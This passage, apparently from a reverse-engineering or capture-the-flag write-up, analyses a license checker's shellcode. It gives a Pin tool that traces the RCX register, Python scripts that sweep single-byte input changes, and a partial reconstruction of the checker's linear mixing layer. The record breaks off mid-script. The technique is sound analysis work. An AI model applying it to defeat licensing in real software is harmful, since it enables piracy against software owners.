                got = extract_qword_from_log(LOG_PATH, plain, MARKER_N, dbg_tag=tag)
                if not got or not got[0]:
                    f.write(f"pos{pos} bit{bit} : {old:02X}->{new:02X} <parse failed>\n")
                    continue
                pick, marker_line, marker_text = got
                q, ln, reg, txt = pick
                le = le_bytes(q)
                delta = bytes([le[i] ^ base_le[i] for i in range(8)])
                picked = [le[i] for i in outidx]
                picked_base = [base_le[i] for i in outidx]
                picked_delta = [picked[t] ^ picked_base[t] for t in range(len(outidx))]
                changed_outidx = [outidx[t] for t in range(len(outidx)) if picked[t] != picked_base[t]]
                if DEBUG_EACH_RUN:
                    print(f"[dbg] pos{pos} bit{bit} {old:02X}->{new:02X} "
                          f"markerL{marker_line} pickL{ln} {reg}=0x{q:016X} "
                          f"picked_delta={fmt_hex_bytes(bytes(picked_delta))}")
                f.write(
                    f"pos{pos} bit{bit} : {old:02X}->{new:02X} | "
                    f"pick {reg}=0x{q:016X} (L{ln}) | "
                    f"LE={fmt_hex_bytes(le)} | "
                    f"delta={fmt_hex_bytes(delta)} | "
                    f"picked@outidx={fmt_hex_bytes(bytes(picked))} | "
                    f"picked_delta={fmt_hex_bytes(bytes(picked_delta))} | "
                    f"changed_outidx={changed_outidx}\n")
            f.write("\n")
    print(f"[+] Wrote: {OUT_PATH}")


if __name__ == "__main__":
    main()

The output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[dbg:base] hit marker#0 at L9295, pick L9265 rcx=0x306DA92E496427C0
[dbg:pos0bit0 11->10] hit marker#0 at L9306, pick L9276 rcx=0x326DA92E496126D0
[dbg] pos0 bit0 11->10 markerL9306 pickL9276 rcx=0x326DA92E496126D0 picked_delta=10 01 05 02
[dbg:pos0bit1 11->13] hit marker#0 at L9345, pick L9315 rcx=0x346DA92E496E25E0
[dbg] pos0 bit1 11->13 markerL9345 pickL9315 rcx=0x346DA92E496E25E0 picked_delta=20 02 0a 04
[dbg:pos0bit2 11->15] hit marker#0 at L9400, pick L9370 rcx=0x386DA92E49702380
[dbg] pos0 bit2 11->15 markerL9400 pickL9370 rcx=0x386DA92E49702380 picked_delta=40 04 14 08
[dbg:pos0bit3 11->19] hit marker#0 at L9374, pick L9344 rcx=0x206DA92E494C2F40
[dbg] pos0 bit3 11->19 markerL9374 pickL9344 rcx=0x206DA92E494C2F40 picked_delta=80 08 28 10
[dbg:pos0bit4 11->01] hit marker#0 at L9355, pick L9325 rcx=0x106DA92E493436C0
[dbg] pos0 bit4 11->01 markerL9355 pickL9325 rcx=0x106DA92E493436C0 picked_delta=00 11 50 20
[dbg:pos0bit5 11->31] hit marker#0 at L9303, pick L9273 rcx=0x706DA92E49C405C0
[dbg] pos0 bit5 11->31 markerL9303 pickL9273 rcx=0x706DA92E49C405C0 picked_delta=00 22 a0 40
[dbg:pos0bit6 11->51] hit marker#0 at L9347, pick L9317 rcx=0xB06DA92E482463C0
[dbg] pos0 bit6 11->51 markerL9347 pickL9317 rcx=0xB06DA92E482463C0 picked_delta=00 44 40 80
[dbg:pos0bit7 11->91] hit marker#0 at L9364, pick L9334 rcx=0x306DA92F4BE4AFC0
[dbg] pos0 bit7 11->91 markerL9364 pickL9334 rcx=0x306DA92F4BE4AFC0 picked_delta=00 88 80 00
[dbg:pos1bit0 11->10] hit marker#0 at L9336, pick L9306 rcx=0x306DA92C4C6537C0
[dbg] pos1 bit0 11->10 markerL9336 pickL9306 rcx=0x306DA92C4C6537C0 picked_delta=10 01 05 02
[dbg:pos1bit1 11->13] hit marker#0 at L9377, pick L9347 rcx=0x306DA92A436607C0
...

Build linear model:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def A(x):
    """Shift left by 4 within one byte."""
    shifted = x << 4
    return shifted & 0xFF
def B(x):
    """XOR the value with itself shifted right by 4."""
    high_part = x >> 4
    return x ^ high_part
def C(x):
    """XOR the value with itself shifted left by 2 (kept within one byte)."""
    shifted = (x << 2) & 0xFF
    return x ^ shifted
def D(x):
    """Shift left by 1 within one byte."""
    doubled = x << 1
    return doubled & 0xFF
def E(x):
    """XOR the value with itself shifted left by 4 (kept within one byte)."""
    shifted = (x << 4) & 0xFF
    return x ^ shifted
def T(???): ???

# Linear layer over one 8-byte block. Each output byte XORs four input bytes
# after applying one of the byte maps A..E, so every input byte reaches
# exactly four output bytes (e.g. state[0] feeds out[0], out[1], out[2] and
# out[7]). The result is then XORed with the constant K and with T.
# NOTE: T(???) is an unresolved placeholder, so this listing is pseudo-code
# and does not run as written.
def L(state):
out = [0] * 8
out[0] = A(state[0]) ^ C(state[2]) ^ B(state[3]) ^ D(state[5])
out[1] = B(state[0]) ^ A(state[1]) ^ C(state[3]) ^ D(state[6])
out[2] = C(state[0]) ^ B(state[1]) ^ A(state[2]) ^ D(state[7])
out[3] = C(state[1]) ^ B(state[2]) ^ A(state[3]) ^ D(state[4])
out[4] = D(state[1]) ^ E(state[4]) ^ C(state[6]) ^ B(state[7])
out[5] = D(state[2]) ^ B(state[4]) ^ E(state[5]) ^ C(state[7])
out[6] = D(state[3]) ^ C(state[4]) ^ B(state[5]) ^ E(state[6])
out[7] = D(state[0]) ^ C(state[5]) ^ B(state[6]) ^ E(state[7])
# Per-byte constant XORed into every output byte.
K = [0xB7, 0x50, 0x13, 0x3E, 0x48, 0xCF, 0x0B, 0x56]
return [out[i] ^ K[i] ^ T(???) for i in range(8)]

The T term is an array whose entries only take values in 0~3, but how those values are derived is complicated. To investigate it, optimize the Pin script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
#include "pin.H"
#include <string>
#include <algorithm>
#include <cstdio>
#include <cstdint>

// Command-line knobs:
//   -o               result file
//   -call_rva        RVA of the shellcode call site inside Doll.dll
//   -sentinel        RCX value that ends the trace
//   -min_hex_digits  minimum number of hex digits for an RCX value to count
KNOB<std::string> KnobOut(KNOB_MODE_WRITEONCE, "pintool", "o", "rcx_result.txt", "result output file");
KNOB<UINT64> KnobCallRva(KNOB_MODE_WRITEONCE, "pintool", "call_rva", "0x120B", "RVA of 'call rsi' in Doll.dll");
KNOB<UINT64> KnobSentinel(KNOB_MODE_WRITEONCE, "pintool", "sentinel", "0xEEEEEEEEEEEEEEEE", "stop sentinel RCX");
KNOB<UINT32> KnobMinHexDigits(KNOB_MODE_WRITEONCE, "pintool", "min_hex_digits", "14", "valid RCX min hex digits (14 or 15)");

// Absolute address of the call site; stays 0 until ImageLoad sees doll.dll.
static ADDRINT g_callsite = 0;
// TLS slot holding each thread's TData.
static TLS_KEY g_tls;
// Result stream; written under g_lock.
static FILE* g_fp = nullptr;
static PIN_LOCK g_lock;
// Set once the result line has been written; later analysis calls return early.
static volatile bool g_done = false;

// Per-thread tracking state kept in the Pin TLS slot g_tls.
struct TData {
    // Set by EnterShellcode.
    bool in_sc = false;
    // Half-open address range [sc_lo, sc_hi) that ShouldTrack accepts.
    ADDRINT sc_lo = 0;
    ADDRINT sc_hi = 0;
    // Return value and size argument recorded around VirtualAlloc.
    ADDRINT last_va_base = 0;
    ADDRINT last_va_size = 0;
    // Last RCX value observed; used to ignore repeated values.
    UINT64 last_seen_rcx = ~UINT64(0);
    // Most recent RCX value with enough hex digits, and whether one exists.
    UINT64 last_valid_rcx = 0;
    bool has_valid = false;
};

// Returns a copy of `s` in which every character has been passed through
// std::tolower (via unsigned char, so negative char values are safe).
static inline std::string ToLower(std::string s) {
    for (std::string::size_type i = 0; i < s.size(); ++i) {
        s[i] = (char)std::tolower((unsigned char)s[i]);
    }
    return s;
}

// Number of hexadecimal digits needed to print `v` without leading zeros
// (zero counts as one digit).
static inline UINT32 HexDigits(UINT64 v) {
    UINT32 digits = 1;
    for (v >>= 4; v != 0; v >>= 4) {
        ++digits;
    }
    return digits;
}

// Fetches the TData pointer stored in this thread's g_tls slot (may be null).
static TData* GetTD(THREADID tid) {
    void* slot = PIN_GetThreadData(g_tls, tid);
    return static_cast<TData*>(slot);
}

// Thread-start callback: allocates the per-thread state and publishes it in
// the g_tls slot.
static VOID ThreadStart(THREADID tid, CONTEXT* /*ctxt*/, INT32 /*flags*/, VOID* /*v*/) {
    PIN_SetThreadData(g_tls, new TData(), tid);
}

// Thread-exit callback: releases the state allocated in ThreadStart.
static VOID ThreadFini(THREADID tid, const CONTEXT* /*ctxt*/, INT32 /*code*/, VOID* /*v*/) {
    // Deleting a null pointer is a no-op, so no explicit check is needed.
    delete GetTD(tid);
}

// Runs before VirtualAlloc: remembers the requested size (second argument)
// for the calling thread.
static VOID VA_Before(THREADID tid, ADDRINT /*lpAddress*/, ADDRINT dwSize, ADDRINT /*flAllocationType*/, ADDRINT /*flProtect*/) {
    if (TData* state = GetTD(tid)) {
        state->last_va_size = dwSize;
    }
}

// Runs after VirtualAlloc: remembers the returned base address for the
// calling thread.
static VOID VA_After(THREADID tid, ADDRINT ret) {
    if (TData* state = GetTD(tid)) {
        state->last_va_base = ret;
    }
}

// Called right before the instrumented call site executes. Resets the RCX
// tracking state and picks the address range to track: the last VirtualAlloc
// region when its base equals the call target, otherwise a 0x200000-byte
// window starting at the target.
static VOID EnterShellcode(THREADID tid, ADDRINT shell_entry) {
    TData* state = GetTD(tid);
    if (state == nullptr) {
        return;
    }

    state->in_sc = true;
    state->last_seen_rcx = UINT64(-1);
    state->last_valid_rcx = 0;
    state->has_valid = false;

    const bool matches_alloc =
        state->last_va_size > 0 && state->last_va_base == shell_entry;
    const ADDRINT span = matches_alloc ? state->last_va_size : (ADDRINT)0x200000;
    state->sc_lo = shell_entry;
    state->sc_hi = shell_entry + span;
}

// If-predicate for the per-instruction analysis call: returns 1 only while
// the result has not been written yet, this thread is inside the shellcode
// and `ip` lies in [sc_lo, sc_hi).
static ADDRINT ShouldTrack(THREADID tid, ADDRINT ip) {
    if (g_done) {
        return 0;
    }
    const TData* state = GetTD(tid);
    const bool inside = state != nullptr
                     && state->in_sc
                     && state->sc_lo <= ip
                     && ip < state->sc_hi;
    return inside ? 1 : 0;
}

// Tracks RCX inside the shellcode. Every new value with at least
// min_hex_digits hex digits is remembered; when the sentinel value shows up,
// the last remembered value (or an all-zero line if there is none) is written
// to the result file and the application is terminated.
static VOID OnRCX(THREADID tid, ADDRINT rcx) {
    if (g_done) {
        return;
    }
    TData* state = GetTD(tid);
    if (state == nullptr) {
        return;
    }

    const UINT64 value = (UINT64)rcx;
    if (state->last_seen_rcx == value) {
        return;  // unchanged since the previous instruction
    }
    state->last_seen_rcx = value;

    if (value != KnobSentinel.Value()) {
        if (HexDigits(value) >= KnobMinHexDigits.Value()) {
            state->last_valid_rcx = value;
            state->has_valid = true;
        }
        return;
    }

    // Sentinel reached: emit the result exactly once.
    PIN_GetLock(&g_lock, 0);
    if (!g_done && g_fp) {
        g_done = true;
        if (state->has_valid) {
            std::fprintf(g_fp, "0x%016llX\n", (unsigned long long)state->last_valid_rcx);
        } else {
            std::fprintf(g_fp, "0x0000000000000000\n");
        }
        std::fflush(g_fp);
    }
    PIN_ReleaseLock(&g_lock);

    PIN_ExitApplication(0);
}

// Image-load callback. Hooks VirtualAlloc in any image that exports it, and
// computes the absolute call-site address once an image whose name contains
// "doll.dll" (case-insensitive) is loaded.
static VOID ImageLoad(IMG img, VOID*) {
    const std::string lowered = ToLower(IMG_Name(img));

    RTN alloc_rtn = RTN_FindByName(img, "VirtualAlloc");
    if (RTN_Valid(alloc_rtn)) {
        RTN_Open(alloc_rtn);
        // Entry probe: forwards the first four arguments to VA_Before.
        RTN_InsertCall(alloc_rtn, IPOINT_BEFORE, (AFUNPTR)VA_Before,
                       IARG_THREAD_ID,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 0,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 1,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 2,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 3,
                       IARG_END);
        // Exit probe: forwards the return value to VA_After.
        RTN_InsertCall(alloc_rtn, IPOINT_AFTER, (AFUNPTR)VA_After,
                       IARG_THREAD_ID,
                       IARG_FUNCRET_EXITPOINT_VALUE,
                       IARG_END);
        RTN_Close(alloc_rtn);
    }

    if (lowered.find("doll.dll") == std::string::npos) {
        return;
    }
    // Call site = image load address + RVA from the call_rva knob.
    const ADDRINT image_base = IMG_LowAddress(img);
    g_callsite = image_base + (ADDRINT)KnobCallRva.Value();
}

// Instruction-level instrumentation callback.
// - At the configured call site, EnterShellcode runs first with the value of
//   RSI (the call target).
// - Every instruction gets an If/Then pair: OnRCX(RCX) runs only when
//   ShouldTrack(ip) returns non-zero. The If call must be inserted directly
//   before its Then call, so the order of the two calls below matters.
static VOID Instruction(INS ins, VOID*) {
if (g_callsite != 0 && INS_Address(ins) == g_callsite) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)EnterShellcode,
IARG_THREAD_ID,
IARG_REG_VALUE, REG_RSI,
IARG_END);
}
// Predicate: is this thread currently inside the tracked window?
INS_InsertIfCall(ins, IPOINT_BEFORE, (AFUNPTR)ShouldTrack,
IARG_THREAD_ID,
IARG_INST_PTR,
IARG_END);
// Action: sample RCX before the instruction executes.
INS_InsertThenCall(ins, IPOINT_BEFORE, (AFUNPTR)OnRCX,
IARG_THREAD_ID,
IARG_REG_VALUE, REG_RCX,
IARG_END);
}

// Application-exit callback. If OnRCX never wrote a result, emits an
// all-zero placeholder line so the output file is never empty, then closes
// the output file.
static VOID Fini(INT32, VOID*) {
    // The owner value passed to PIN_GetLock must be non-zero.
    PIN_GetLock(&g_lock, 1);
    if (!g_done && g_fp) {
        std::fprintf(g_fp, "0x0000000000000000\n");
        std::fflush(g_fp);
    }
    PIN_ReleaseLock(&g_lock);
    if (g_fp) {
        std::fclose(g_fp);
        // Do not leave a dangling FILE* behind for any late caller.
        g_fp = nullptr;
    }
}

// Pin tool entry point: initialises Pin, the TLS key, the lock and the
// output file, registers all callbacks and starts the target program.
// Returns 1 if Pin initialisation fails and 2 if the output file cannot be
// opened; PIN_StartProgram is the last call made.
int main(int argc, char* argv[]) {
    PIN_InitSymbols();
    if (PIN_Init(argc, argv)) {
        return 1;
    }

    g_tls = PIN_CreateThreadDataKey(nullptr);
    PIN_InitLock(&g_lock);

    const char* out_path = KnobOut.Value().c_str();
    g_fp = std::fopen(out_path, "wb");
    if (g_fp == nullptr) {
        return 2;
    }

    IMG_AddInstrumentFunction(ImageLoad, nullptr);
    INS_AddInstrumentFunction(Instruction, nullptr);
    PIN_AddThreadStartFunction(ThreadStart, nullptr);
    PIN_AddThreadFiniFunction(ThreadFini, nullptr);
    PIN_AddFiniFunction(Fini, nullptr);

    PIN_StartProgram();
    return 0;
}

Python script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
# -*- coding: utf-8 -*-

import os
import re
import json
import time
import subprocess
from pathlib import Path
from datetime import datetime

PIN_CMD = ["pin", "-t", "Dump.dll", "--", "LicenseChecker.exe"]
WORKDIR = os.getcwd()

INPUT_PATH = os.path.join(WORKDIR, "license.bin")
RCX_PATH = os.path.join(WORKDIR, "rcx_result.txt")
OUT_PATH = os.path.join(WORKDIR, "rcx_table.jsonl")

BASE_BYTE = 0xAA
TAIL_BYTE = 0xEE
HEAD_LEN = 8
TAIL_LEN = 24
MAX_RETRY = 3
PIN_TIMEOUT = 30

HEX_RE = re.compile(r"0x([0-9a-fA-F]+)")

def build_input_bytes(head8: bytes) -> bytes:
    """Build the 32-byte license: `head8` followed by TAIL_LEN copies of TAIL_BYTE.

    Raises ValueError if `head8` is not HEAD_LEN bytes long, if the result is
    not 32 bytes long, or if the result contains a zero byte.
    """
    if len(head8) != HEAD_LEN:
        raise ValueError("head")
    padding = bytes([TAIL_BYTE] * TAIL_LEN)
    lic = head8 + padding
    if len(lic) != 32:
        raise ValueError("inp")
    if any(b == 0 for b in lic):
        raise ValueError("inp contains 0x00")
    return lic

def write_input(head8: bytes):
    """Write the license built from `head8` to INPUT_PATH, replacing its content."""
    payload = build_input_bytes(head8)
    with open(INPUT_PATH, "wb") as sink:
        sink.write(payload)

def clear_rcx_file():
    """Truncate RCX_PATH so a stale result from an earlier run cannot be read back."""
    # A compound `with` statement cannot follow `def ...:` on the same line,
    # so the body has to live on its own indented lines.
    with open(RCX_PATH, "w", encoding="utf-8") as f:
        f.write("")

def run_pin_once():
    """Run PIN_CMD once in WORKDIR with its output discarded.

    The exit status is ignored (check=False); subprocess.TimeoutExpired is
    raised if the run takes longer than PIN_TIMEOUT seconds.
    """
    quiet = subprocess.DEVNULL
    subprocess.run(
        PIN_CMD,
        cwd=WORKDIR,
        stdout=quiet,
        stderr=quiet,
        timeout=PIN_TIMEOUT,
        check=False,
    )

def parse_rcx_result() -> int:
    """Return the last `0x...` value found in RCX_PATH as an integer.

    Raises RuntimeError if the file is missing, empty, or contains no hex value.
    """
    result_file = Path(RCX_PATH)
    if not result_file.exists():
        raise RuntimeError("rcx_result.txt not exist")
    content = result_file.read_text(encoding="utf-8", errors="ignore").strip()
    if not content:
        raise RuntimeError("rcx_result.txt empty")
    # Walk all matches and keep only the final one.
    last = None
    for last in HEX_RE.finditer(content):
        pass
    if last is None:
        raise RuntimeError("rcx_result.txt no hex")
    return int(last.group(1), 16)

def run_case_get_rcx(head8: bytes) -> int:
    """Run one Pin measurement for `head8` and return the RCX value it reports.

    Each attempt writes the input, clears the result file, runs Pin and
    parses the result. Any exception triggers a retry after a 50 ms pause;
    after MAX_RETRY failed attempts a RuntimeError carrying the last error
    is raised.
    """
    last_err = None
    attempts_left = MAX_RETRY
    while attempts_left > 0:
        attempts_left -= 1
        try:
            write_input(head8)
            clear_rcx_file()
            run_pin_once()
            return parse_rcx_result()
        except Exception as exc:
            last_err = exc
            time.sleep(0.05)
    raise RuntimeError(f"case fail (retry {MAX_RETRY} times): {last_err}")

def append_record(rec: dict):
    """Append `rec` as one JSON line to OUT_PATH and force it to disk."""
    serialized = json.dumps(rec, ensure_ascii=False) + "\n"
    with open(OUT_PATH, "a", encoding="utf-8") as sink:
        sink.write(serialized)
        # Flush Python's buffer, then ask the OS to commit the data, so an
        # interrupted run keeps every finished record.
        sink.flush()
        os.fsync(sink.fileno())

def load_done_set(out_path: str):
    """Return the set of (pos, val) pairs that already have a successful record.

    Reads the JSON-lines file at `out_path`; a missing file yields an empty
    set. A line counts as done only when it is a JSON object that carries an
    "rcx_hex" result and no "error" key, with 0 <= pos < 8 and
    1 <= val <= 255. Error records also contain "pos"/"val"; treating them as
    done would prevent failed cases from ever being retried on resume.
    Blank and malformed lines are ignored.
    """
    done = set()
    if not os.path.exists(out_path):
        return done

    with open(out_path, "r", encoding="utf-8", errors="ignore") as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            try:
                obj = json.loads(line)
                if not isinstance(obj, dict):
                    continue
                if "error" in obj or "rcx_hex" not in obj:
                    continue
                pos = int(obj["pos"])
                val = int(obj["val"])
            except (KeyError, TypeError, ValueError):
                # Truncated or hand-edited line: skip it, keep loading.
                continue
            if 0 <= pos < 8 and 1 <= val <= 255:
                done.add((pos, val))
    return done

def make_head(base_byte: int, pos: int, val: int) -> bytes:
    """Return eight copies of `base_byte` with the byte at index `pos` replaced by `val`."""
    head = bytearray(bytes([base_byte]) * 8)
    head[pos] = val
    return bytes(head)

def fmt_hex16(v: int) -> str:
    """Format `v` as `0x` followed by 16 upper-case, zero-padded hex digits."""
    return "0x" + format(v, "016X")

def main():
    """Measure RCX for every one-hot input and append the results to OUT_PATH.

    For each of the 8 head positions and each value 1..255, the head is
    BASE_BYTE everywhere except that position. Pairs already returned by
    load_done_set(OUT_PATH) are skipped, so an interrupted run can be
    resumed. A failed case is logged as an error record and the sweep goes on.
    """
    # Local import: the file only imports `datetime` from the datetime module.
    from datetime import timezone

    def utc_stamp() -> str:
        # Same "naive ISO-8601 + Z" text as datetime.utcnow().isoformat() + "Z",
        # without utcnow(), which is deprecated since Python 3.12.
        return datetime.now(timezone.utc).replace(tzinfo=None).isoformat() + "Z"

    total = 8 * 255
    done = load_done_set(OUT_PATH)
    print(f"[+] Completed: {len(done)}/{total}")

    # Baseline run (all bytes BASE_BYTE) is informational only; a failure
    # here does not stop the sweep.
    base_head = bytes([BASE_BYTE] * 8)
    try:
        base_rcx = run_case_get_rcx(base_head)
        print(f"[+] baseline(AA*8) rcx = {fmt_hex16(base_rcx)}")
    except Exception as e:
        print(f"[!] baseline read failed: {e}")

    start_time = time.time()
    finished_now = 0
    for pos in range(8):
        for val in range(1, 256):
            key = (pos, val)
            if key in done:
                continue
            head = make_head(BASE_BYTE, pos, val)
            try:
                rcx = run_case_get_rcx(head)
                rec = {
                    "pos": pos,
                    "val": val,
                    "val_hex": f"{val:02X}",
                    "state_hex": head.hex(),
                    # Record exactly the bytes write_input() put on disk.
                    "input32_hex": build_input_bytes(head).hex(),
                    "rcx_hex": fmt_hex16(rcx),
                    "rcx_le_hex": rcx.to_bytes(8, "little", signed=False).hex(),
                    "rcx_be_hex": rcx.to_bytes(8, "big", signed=False).hex(),
                    "ts": utc_stamp(),
                }
                append_record(rec)
                done.add(key)
                finished_now += 1
                done_cnt = len(done)
                elapsed = time.time() - start_time
                speed = finished_now / elapsed if elapsed > 0 else 0.0
                remain = total - done_cnt
                eta = remain / speed if speed > 1e-9 else float("inf")
                print(
                    f"[OK] pos={pos} val=0x{val:02X} rcx={fmt_hex16(rcx)} | "
                    f"progress {done_cnt}/{total} | speed={speed:.2f}/s | eta={eta/60:.1f}m"
                )
            except Exception as e:
                err_rec = {
                    "pos": pos,
                    "val": val,
                    "val_hex": f"{val:02X}",
                    "state_hex": head.hex(),
                    "error": str(e),
                    "ts": utc_stamp(),
                }
                append_record(err_rec)
                print(f"[ERR] pos={pos} val=0x{val:02X} -> {e}")
    print("[+] Finished")

if __name__ == "__main__":
main()

Generate table:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
# -*- coding: utf-8 -*-

import argparse
import json
from collections import Counter
from pathlib import Path
from typing import List, Dict, Tuple, Optional

def A(x):
    """x shifted left by 4, truncated to 8 bits."""
    shifted = x << 4
    return shifted & 0xFF


def B(x):
    """x XOR (x shifted right by 4)."""
    high = x >> 4
    return x ^ high


def C(x):
    """x XOR (x shifted left by 2, truncated to 8 bits)."""
    shifted = (x << 2) & 0xFF
    return x ^ shifted


def D(x):
    """x shifted left by 1, truncated to 8 bits."""
    shifted = x << 1
    return shifted & 0xFF


def E(x):
    """x XOR (x shifted left by 4, truncated to 8 bits)."""
    shifted = (x << 4) & 0xFF
    return x ^ shifted

def L(state: List[int]) -> List[int]:
    """Apply the byte-wise mixing layer to an 8-byte state.

    Each output byte is the XOR of four transformed input bytes; row k of
    the table below lists the (transform, input index) pairs for output k.
    """
    rows = (
        ((A, 0), (C, 2), (B, 3), (D, 5)),
        ((B, 0), (A, 1), (C, 3), (D, 6)),
        ((C, 0), (B, 1), (A, 2), (D, 7)),
        ((C, 1), (B, 2), (A, 3), (D, 4)),
        ((D, 1), (E, 4), (C, 6), (B, 7)),
        ((D, 2), (B, 4), (E, 5), (C, 7)),
        ((D, 3), (C, 4), (B, 5), (E, 6)),
        ((D, 0), (C, 5), (B, 6), (E, 7)),
    )
    mixed = []
    for terms in rows:
        acc = 0
        for transform, idx in terms:
            acc ^= transform(state[idx])
        mixed.append(acc & 0xFF)
    return mixed

def unpack_le64(v: int) -> List[int]:
    """Split `v` into its eight low bytes, least-significant byte first."""
    return [(v >> shift) & 0xFF for shift in range(0, 64, 8)]

def pack_le(bs: List[int]) -> int:
    """Combine bytes (least-significant first) into one integer; each item is masked to 8 bits."""
    # The byte lanes never overlap, so adding them equals OR-ing them.
    return sum((b & 0xFF) << (8 * i) for i, b in enumerate(bs))

def xor8(a: List[int], b: List[int]) -> List[int]:
    """Byte-wise XOR of the first eight items of `a` and `b`, each masked to 8 bits."""
    result = []
    for k in range(8):
        result.append((a[k] ^ b[k]) & 0xFF)
    return result

def fmt64(x: int) -> str:
    """Format `x` as `0x` followed by 16 upper-case, zero-padded hex digits."""
    return "0x" + format(x, "016X")

def expected_state_hex(base_byte: int, pos: int, val: int) -> str:
    """Hex string of eight `base_byte` bytes with the byte at index `pos` replaced by `val`."""
    state = [base_byte for _ in range(8)]
    state[pos] = val
    return bytes(state).hex()

def keff_from_state_rcx(state8: List[int], rcx64: int) -> List[int]:
    """Return the observed output bytes (little-endian `rcx64`) XOR L(state8)."""
    observed = unpack_le64(rcx64)
    return xor8(observed, L(state8))

def predict_y(state8: List[int], K0: List[int], U: List[List[Optional[List[int]]]]) -> Optional[int]:
    """Predict the 64-bit output for `state8` from the fitted model.

    The prediction is L(state8) XOR K0 XOR U[i][state8[i]] for every position
    i, packed little-endian. Returns None when any required U entry is missing.
    """
    deltas = []
    for i in range(8):
        delta = U[i][state8[i]]
        if delta is None:
            return None
        deltas.append(delta)

    key = K0[:]
    for delta in deltas:
        key = xor8(key, delta)
    return pack_le(xor8(L(state8), key))

def parse_rcx_hex(obj: dict) -> Optional[int]:
    """Parse the record's "rcx_hex" field as a base-16 integer.

    Raises KeyError if the field is absent and ValueError if it is not hex.
    """
    raw = obj["rcx_hex"]
    return int(str(raw), 16)

def main():
    """Fit K0 and the per-position tables U from the one-hot samples.

    Reads the JSON-lines sample file, keeps the samples whose state differs
    from the all-`base_byte` state in at most one position, derives
    K0 = rcx(base) XOR L(base) and U[i][v] = (rcx XOR L(state)) XOR K0,
    checks the model against every usable row, writes
    `<out-prefix>_arrays.py` and prints a summary.

    Lines that are not valid JSON, lack "state_hex" or "rcx_hex" (for
    example error records), or do not describe an 8-byte state are skipped
    and counted. RuntimeError is raised when no baseline sample is available
    and --base-rcx was not given.
    """
    ap = argparse.ArgumentParser()
    ap.add_argument("--infile", default="rcx_table.jsonl")
    ap.add_argument("--out-prefix", default="model")
    ap.add_argument("--base-byte", default="AA")
    ap.add_argument("--base-rcx", default="")
    args = ap.parse_args()
    in_path = Path(args.infile)
    base_byte = int(args.base_byte, 16) & 0xFF

    # ---- load samples -----------------------------------------------------
    rows = []
    skipped = 0
    with in_path.open("r", encoding="utf-8", errors="ignore") as f:
        for ln, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue
            try:
                obj = json.loads(line)
                st_hex = str(obj["state_hex"]).lower()
                st = list(bytes.fromhex(st_hex))
                rcx = parse_rcx_hex(obj)
                pos = obj.get("pos", None)
                val = obj.get("val", None)
                pos = int(pos) if pos is not None else None
                val = int(val) if val is not None else None
            except (AttributeError, KeyError, TypeError, ValueError):
                skipped += 1
                continue
            if rcx is None or len(st) != 8:
                skipped += 1
                continue
            rows.append({
                "line": ln,
                "state": st,
                "state_hex": st_hex,
                "rcx": rcx,
                "pos": pos,
                "val": val
            })

    # ---- group samples by (position, value) -------------------------------
    onehot: Dict[Tuple[int, int], List[int]] = {}  # key -> [rcx...]
    for r in rows:
        st = r["state"]
        pos = r["pos"]
        val = r["val"]
        if pos is None or val is None:
            # No explicit label: infer it from the state itself.
            diffs = [i for i in range(8) if st[i] != base_byte]
            if len(diffs) == 0:
                for p in range(8):
                    onehot.setdefault((p, base_byte), []).append(r["rcx"])
            elif len(diffs) == 1:
                p = diffs[0]
                onehot.setdefault((p, st[p]), []).append(r["rcx"])
            continue
        if not (0 <= pos < 8 and 0 <= val <= 255):
            continue
        if r["state_hex"] != expected_state_hex(base_byte, pos, val):
            continue
        onehot.setdefault((pos, val), []).append(r["rcx"])

    # ---- majority vote per (position, value) ------------------------------
    raw_rcx: List[List[Optional[int]]] = [[None] * 256 for _ in range(8)]
    conflicts = []
    for (pos, val), arr in onehot.items():
        c = Counter(arr)
        rcx_mode = c.most_common(1)[0][0]
        if len(c) > 1:
            conflicts.append((pos, val, dict(c)))
        raw_rcx[pos][val] = rcx_mode

    # ---- baseline ---------------------------------------------------------
